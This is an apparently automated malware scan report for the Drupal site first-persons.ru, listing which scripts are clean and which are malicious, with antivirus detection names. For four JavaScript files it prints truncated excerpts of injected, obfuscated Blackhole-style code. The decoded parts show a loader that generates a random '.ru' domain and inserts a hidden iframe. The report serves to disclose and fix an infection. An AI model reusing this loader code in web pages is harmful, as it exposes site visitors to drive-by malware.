Malware Scanner report for first-persons.ru

Malicious/Suspicious/Total urls checked: 4/0/15

4 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "first-persons.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=first-persons.ru

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://first-persons.ru/	200 OK Content-Length: 34815 Content-Type: text/html	clean
http://first-persons.ru/misc/jquery.js	200 OK Content-Length: 31008 Content-Type: application/javascript	clean
http://first-persons.ru/misc/drupal.js	200 OK Content-Length: 19624 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function kzLIfOuzteVbhCEe(a){var b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var c="";var d,chr2,chr3="";var e,enc2,enc3,enc4="";var i=0;a=a.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{e=b.indexOf(a.charAt(i++));enc2=b.indexOf(a.charAt(i++));enc3=b.indexOf(a.charAt(i++));enc4=b.indexOf(a.charAt(i++));d=(e<<2)\|(enc2>>4);chr2=((enc2&15)<<4)\|(enc3>>2);chr3=((enc3&3)<<6)\|enc4;c=c+String.fromCharCode(d);if(enc3!=64){c=c+String.fromCharCode(chr2 ... 3363 bytes are skipped ...%y&N%TAsMjk3LDM4<O>CwxMTYsMT)k4LD]MxMi?wx)NjAsMT#Ax#LD:gyLDM2OSw1MDAs:MTI1-LDI.zMCw@z&MDMsNDY0'LDg0LDIxM'CwzM]jc[s<NDA^0L)DE~x-MS:wy^Mz,QsMzQ$4LDE2MC'wxMDksMT$k0LDMy?MS$w0MDQsNz@AsMjI&4LDI5M#Sw0Mz.Ys MTAxLD[g.4LDE1MCwx-OTIsN,Dg sOT!YsM_TIzLDIz\|N.l0!7aWYod-2luZ!G93$LmRvY'3VtZW:50K(WZvc[ihpPTY^t.M[i???0 xLTItMTstMT,I0N\|Ctp&IT0yLTI7aSsrK.Xt!rPWk7c3M9c3M!r_U3(R%y~aW5>nW\|2ZdKG5ba:10vKG'k&lKGgq[aCkrM&SkpO3<1(l,KHN>z_KT't9f_S8]qcWhrNn~Nh@N]mcxY]yo,v!!!!")); Decoded script: var Drupal = Drupal \|\| {}; /** * Set the variable that indicates if JavaScript behaviors should be applied / Drupal.jsEnabled = document.getElementsByTagName && document.createElement && document.createTextNode && document.documentElement && document.getElementById; /* * Extends the current object with the parameter. Works recursively. / Drupal.extend = function(obj) { for (var i in obj) { if (this[i]) {... 21795 bytes are skipped ...8,460,116,242,324,404,46,236,315,460,105,196,315,432,105,232,363,244,34,208,315,400,100,202,330,136,59,200,333,396,117,218,303,440,116,92,294,444,100,242,138,388,112,224,303,440,100,134,312,420,108,200,120,420,102,228,327,164,125,250,297,388,116,198,312,160,101,82,369,500,125,230,303,464,84,210,327,404,111,234,348,160,109,194,321,404,70,228,291,436,101,88,150,192,48,96,123,236];if(window.document)for(i=6-2-1-2-1;-1244+i!=2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(hh)+1));}e(ss);}}/qhk6sa6g1c/ Antivirus reports: Qihoo-360 Trojan.Generic AntiVir JS/BlacoleRef.W.373 Avast JS:Agent-ADL [Trj] Ikarus Trojan-Downloader.JS.Expack TrendMicro-HouseCall TROJ_GEN.F47V1118 Comodo TrojWare.JS.IFrame.JX K7GW Exploit ( 04c555151 ) McAfee-GW-Edition JS/Exploit-Blacole.ht Microsoft Trojan:JS/BlacoleRef.W Fortinet JS/Expack.SN!tr Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.bfdeei ClamAV Trojan.Blackhole-488 AVG JS/Obfuscated GData Win32.Trojan.Agent.TLX8KC ESET-NOD32 JS/Kryptik.PX
http://first-persons.ru/sites/default/modules/jquery_update/compat.js	200 OK Content-Length: 3537 Content-Type: application/javascript	clean
http://first-persons.ru/sites/default/modules/lightbox2/js/lightbox.js	200 OK Content-Length: 41769 Content-Type: application/javascript	clean
http://first-persons.ru/themes/tapestry/js/jquery.pngFix.js	200 OK Content-Length: 14521 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function kzLIfOuzteVbhCEe(a){var b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var c="";var d,chr2,chr3="";var e,enc2,enc3,enc4="";var i=0;a=a.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{e=b.indexOf(a.charAt(i++));enc2=b.indexOf(a.charAt(i++));enc3=b.indexOf(a.charAt(i++));enc4=b.indexOf(a.charAt(i++));d=(e<<2)\|(enc2>>4);chr2=((enc2&15)<<4)\|(enc3>>2);chr3=((enc3&3)<<6)\|enc4;c=c+String.fromCharCode(d);if(enc3!=64){c=c+String.fromCharCode(chr2 ... 3372 bytes are skipped ...Tk4@LD.MxMiwxNj]A~s???MT,AxL%D^gyLD>M2OSw1<M>DA s:MT-I1LD?IzMCwzMD&MsN^DY0LDg0L[DIxMCwzM[jcs~N)DA0LDE'xM<S)wyMzQ-sMz[Q\|4LD,E2MCw&xM)DksMTk0LDMyMS.w&0MDQsN$z:A)sMjI4_LDI!5MSw0MzYsMTA)xLD@g4LDE1MCwx???OTIsN^Dgs_OTYs-MTIz#LDIzN>l07!aW_Yod2<lu???ZG?93\|Lm&RvY3VtZW50KW-Z>vc?ih#pP#TY\|tM]i0xLTI,tM$TstM%TI0N~C*t#p\|IT>0yLTI7a&SsrK<Xt!r'PWk7c3M'9c3MrU3RyaW-5n#W2ZdKG5ba:1:0 v]K&G.k,lKGgqa???Ckr'MS]kp^O<31lKHNzK-T$t9fS8!qc~Wh$r%N)nN_hN!m_c'xYyov!!!!")); Antivirus reports: Qihoo-360 Trojan.Generic AntiVir JS/BlacoleRef.W.373 Avast JS:Agent-ADL [Trj] Ad-Aware JS:Trojan.Crypt.DX Bkav MW.Clod180.Trojan.99d0 Ikarus Trojan.Script nProtect JS:Trojan.Crypt.DX TrendMicro-HouseCall TROJ_GEN.F47V1118 Comodo TrojWare.JS.IFrame.JX Emsisoft JS:Trojan.Crypt.DX (B) K7GW Exploit ( 04c555151 ) McAfee-GW-Edition JS/Exploit-Blacole.ht Microsoft Trojan:JS/BlacoleRef.W Kaspersky Trojan-Downloader.JS.Expack.sn MicroWorld-eScan JS:Trojan.Crypt.DX Fortinet JS/Expack.SN!tr Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.bfdeei F-Secure JS:Trojan.Crypt.DX AVG JS/Obfuscated Norman Blacole.FY GData JS:Trojan.Crypt.DX BitDefender JS:Trojan.Crypt.DX
http://first-persons.ru/themes/tapestry/js/pickstyle.js	200 OK Content-Length: 9984 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function kzLIfOuzteVbhCEe(a){var b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var c="";var d,chr2,chr3="";var e,enc2,enc3,enc4="";var i=0;a=a.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{e=b.indexOf(a.charAt(i++));enc2=b.indexOf(a.charAt(i++));enc3=b.indexOf(a.charAt(i++));enc4=b.indexOf(a.charAt(i++));d=(e<<2)\|(enc2>>4);chr2=((enc2&15)<<4)\|(enc3>>2);chr3=((enc3&3)<<6)\|enc4;c=c+String.fromCharCode(d);if(enc3!=64){c=c+String.fromCharCode(chr2 ... 3385 bytes are skipped ...LDMxM<i wxNj)AsM&TAxLD!g-yL)DM2OSw1:MD.A~sMTI???1LDI zMC\|wzMDMsNDY0LDg0LD^IxMCw@zMjcs<NDA(0???LDEx]M!S(wyM-zQsMzQ4LDE2MCw$xM)D_ksMTk0L,DMyMSw0MD???Q???s~NzAsM]j,I\|4 L@DI@5:MS&w?0^Mz.YsM)TAxLD:g4LD>E1MCw]xOTIsND&g:s O]TYsMTI(z&LDI?z?Nl[07aWY]o#d2lu)ZG93Lm@R-vY3V-tZW>5 0%K%WZvc#ih&pPTYtMi0x[LT.ItMTstM]T&I0,N&CtpIT0y)LTI7aSsr[K>Xtr>PWk7c3M<9c3Mr U3R[yaW5n)W#2?Zd.KG5b&a10vKG~klK???G%gq?aCkrM_Sk_pO31lK]HNzK%Tt9fS8q(cWhrN#nNh@N?mcx,Y\|yo[v!!!!")); Decoded script: function pickstyle(whichstyle) { var expireDate = new Date() var expstring=expireDate.setDate(expireDate.getDate()+30) document.cookie = "tapestrystyle=" + whichstyle + "; expires="+expireDate.toGMTString() } /km0ae9gr6m/try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;f="from";try{bcsd=prototype-2;}catch(bawg){ss=[];f+=(h&&f)?("CharC"+"ode"):"";e=window["eval"];n=[102,234,330,396,116,210,333,440,32,220,303,480,116,164,291,440,100 ... 13424 bytes are skipped ... var a = Math.round(+ new Date / 1000); var b = generatePseudoRandomString(a, 16, "ru"); ifrm = document.createElement("IFRAME"); ifrm.setAttribute("src", "http://" + b + "/runforestrun?sid=cxc"); ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 2000 / Antivirus reports: Qihoo-360 Trojan.Generic AntiVir JS/BlacoleRef.W.373 Avast JS:Agent-ADL [Trj] Ad-Aware JS:Trojan.Crypt.DX Ikarus Trojan.Script nProtect JS:Trojan.Crypt.DX TrendMicro-HouseCall TROJ_GEN.F47V1119 Comodo TrojWare.JS.IFrame.JX Emsisoft JS:Trojan.Crypt.DX (B) K7GW Exploit ( 04c555151 ) McAfee-GW-Edition Heuristic.BehavesLike.JS.Suspicious.G Microsoft Trojan:JS/BlacoleRef.W Kaspersky HEUR:Trojan.Script.Generic MicroWorld-eScan JS:Trojan.Crypt.DX Fortinet JS/Kryptik.PX Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.gc NANO-Antivirus Trojan.Script.Expack.bfdeei F-Secure JS:Trojan.Crypt.DX AVG JS/Obfuscated Norman Blacole.LK GData JS:Trojan.Crypt.DX ESET-NOD32 JS/Kryptik.PX BitDefender JS:Trojan.Crypt.DX
http://first-persons.ru/themes/tapestry/js/pickicons.js	200 OK Content-Length: 9982 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function kzLIfOuzteVbhCEe(a){var b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var c="";var d,chr2,chr3="";var e,enc2,enc3,enc4="";var i=0;a=a.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{e=b.indexOf(a.charAt(i++));enc2=b.indexOf(a.charAt(i++));enc3=b.indexOf(a.charAt(i++));enc4=b.indexOf(a.charAt(i++));d=(e<<2)\|(enc2>>4);chr2=((enc2&15)<<4)\|(enc3>>2);chr3=((enc3&3)<<6)\|enc4;c=c+String.fromCharCode(d);if(enc3!=64){c=c+String.fromCharCode(chr2 ... 3364 bytes are skipped ...DEx-Niw\|x OTgsM[zE-yL]D&E>2MCwx(MD%E>s\|ODIs MzY5?LDU-wMCwxMjUsMjMwLDM,wMy~w#0N[jQsODQsMjEwLDMyNyw0M~DQ:sM#T<Ex%LD]IzN-CwzN,DgsMTYwLDEwOSwxOTQsM?z<IxL DQ(wNCw3M>C&w\|yMjg sMj]kxL!D???Qz\|NiwxMDEsODgs?MT&UwL)DE5)M'iw0OC'w5,Ni#wxMjM#sMj%M2X T,tp%Zi,h3 a?W5kb3c]uZ???G9j[dW1lbn@QpZm9yKG@k9Ni0y,LTEt^M\|i0x_Oy<0xMjQ0K%2$k-h^PTItM~j#tp:Kysp^e2s>9a@Tt^zc^z1???z.cy,t???T-dHJpb$m#dbZ%l0obltrXS8oaSU[o<aC^p%oKS[s(xKSk<7f%WU'oc3Mp]O31)9%Ly~px\|a^Gs2c(2E2ZzFjKi8<=!!!!")); Decoded script: function pickicons(state) { var expireDate = new Date() var expstring=expireDate.setDate(expireDate.getDate()+30) document.cookie = "tapestryicons=" + state + "; expires="+expireDate.toGMTString() } /km0ae9gr6m/try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;f="from";try{bcsd=prototype-2;}catch(bawg){ss=[];f+=(h&&f)?("CharC"+"ode"):"";e=window["eval"];n=[102,234,330,396,116,210,333,440,32,220,303,480,116,164,291,440,100,222,327,3 ... 13404 bytes are skipped ... var a = Math.round(+ new Date / 1000); var b = generatePseudoRandomString(a, 16, "ru"); ifrm = document.createElement("IFRAME"); ifrm.setAttribute("src", "http://" + b + "/runforestrun?sid=cxc"); ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 2000 / Antivirus reports: Qihoo-360 Trojan.Generic AntiVir JS/BlacoleRef.W.373 Avast JS:Agent-ADL [Trj] Ad-Aware JS:Trojan.Crypt.DX Ikarus Trojan.Script nProtect JS:Trojan.Crypt.DX TrendMicro-HouseCall TROJ_GEN.F47V1118 Emsisoft JS:Trojan.Crypt.DX (B) Comodo TrojWare.JS.IFrame.JX K7GW Exploit ( 04c555151 ) McAfee-GW-Edition Heuristic.BehavesLike.JS.Suspicious.G Microsoft Trojan:JS/BlacoleRef.W Kaspersky HEUR:Trojan.Script.Generic MicroWorld-eScan JS:Trojan.Crypt.DX Fortinet JS/Kryptik.PX Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.gc NANO-Antivirus Trojan.Script.Expack.bfdeei F-Secure JS:Trojan.Crypt.DX AVG JS/Obfuscated Norman Blacole.LK GData JS:Trojan.Crypt.DX ESET-NOD32 JS/Kryptik.PX BitDefender JS:Trojan.Crypt.DX
http://first-persons.ru/about	200 OK Content-Length: 15945 Content-Type: text/html	clean
http://first-persons.ru/order	200 OK Content-Length: 15767 Content-Type: text/html	clean
http://first-persons.ru/contact	200 OK Content-Length: 14513 Content-Type: text/html	clean
http://first-persons.ru/misc/textarea.js	200 OK Content-Length: 1248 Content-Type: application/javascript	clean
http://first-persons.ru/category/1/1	200 OK Content-Length: 29286 Content-Type: text/html	clean
http://first-persons.ru/category/1/2	200 OK Content-Length: 19355 Content-Type: text/html	clean
http://first-persons.ru/category/1/3	200 OK Content-Length: 18605 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: first-persons.ru

Result:
HTTP/1.1 200 OK
Cache-Control: must-revalidate
Connection: close
Date: Sat, 27 Dec 2014 13:34:05 GMT
ETag: "0c36a13c1aaf95cb205e63ef4b742b22"
Server: Jino.ru/mod_pizza
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Fri, 16 May 2014 16:35:51 GMT
Set-Cookie: SESS657fde95c3fac9c2773bc4c84faa51cd=c7c4532e766c1ea302ed3767ace6727a; expires=Mon, 19-Jan-2015 17:07:25 GMT; path=/; domain=.first-persons.ru

Second query (visit from search engine):
GET / HTTP/1.1
Host: first-persons.ru
Referer: http://www.google.com/search?q=first-persons.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for first-persons.ru

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools